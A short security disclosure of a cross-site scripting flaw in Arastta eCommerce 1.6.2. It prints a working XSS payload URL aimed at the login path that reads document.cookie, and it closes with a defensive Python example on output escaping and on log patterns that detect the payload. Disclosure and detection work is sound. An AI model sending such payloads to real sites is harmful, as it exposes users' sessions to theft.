Arastta 1.6.2 XSS Disclosure

Synopsis: Arastta 1.6.2 XSS vulnerability
Product: Arastta eCommerce: Free Shopping Cart
Version: 1.6.2
Researcher: Matt Landers
mattjoeland@gmail.com
twitter.com/matthewjland
https://mjlanders.org/

The XSS that I have found is fairly straightforward.

http://inserthostnamehere.com/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>*/=alert(document.domain)//;

Replace 'inserthostnamehere.com' with the server you would like to test.
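The defect class behind a payload like this is the page reflecting part of the request path into its HTML without escaping it. The Python below is an added example, not Arastta's code and not from the original post: a hypothetical template that reflects the raw path beside one that HTML-escapes it, and a check that flags request lines carrying the same markers in constructed access-log samples. The template, the log lines and the marker regex are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Payload path copied from the disclosure URL above.
PAYLOAD_PATH = ('/index.php/login/"--!>GIF89a/*<svg/onload=alert(document.cookie)>'
                '*/=alert(document.domain)//;')


def render_unsafe(path: str) -> str:
    """Hypothetical vulnerable template (an assumption, not Arastta's code):
    the request path is interpolated verbatim into a comment and an attribute."""
    return f'<!-- request: {path} --><form action="{path}">'


def render_safe(path: str) -> str:
    """Same template with the value HTML-escaped before interpolation."""
    esc = html.escape(path, quote=True)
    return f'<!-- request: {esc} --><form action="{esc}">'


def contains_raw_svg(rendered: str) -> bool:
    """True if the raw <svg> tag from the path survived into the output.
    (The onload handler only fires if the tag itself is parsed as markup.)"""
    return re.search(r'<\s*svg\b', rendered, re.I) is not None


# Constructed access-log samples in Common Log Format; the second carries the
# disclosure's payload in URL-encoded form.
LOG_LINES = [
    '203.0.113.5 - - [01/Jan/2018:12:00:00 +0000] "GET /index.php/login/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2018:12:00:01 +0000] "GET /index.php/login/%22--!%3EGIF89a/'
    '*%3Csvg/onload=alert(document.cookie)%3E*/=alert(document.domain)// HTTP/1.1" 200 5310',
]
# Markers of this payload family: an inline <svg> tag, an on* handler, or the
# "--!>" comment-closing sequence. Assumed signature, tune to your environment.
SUSPECT = re.compile(r'<\s*svg\b|\bon[a-z]+\s*=|--!>', re.I)
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) ')


def flag_requests(lines):
    """Return the client IPs whose URL-decoded request path matches SUSPECT."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and SUSPECT.search(unquote(m.group(2))):
            hits.append(m.group(1))
    return hits
```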
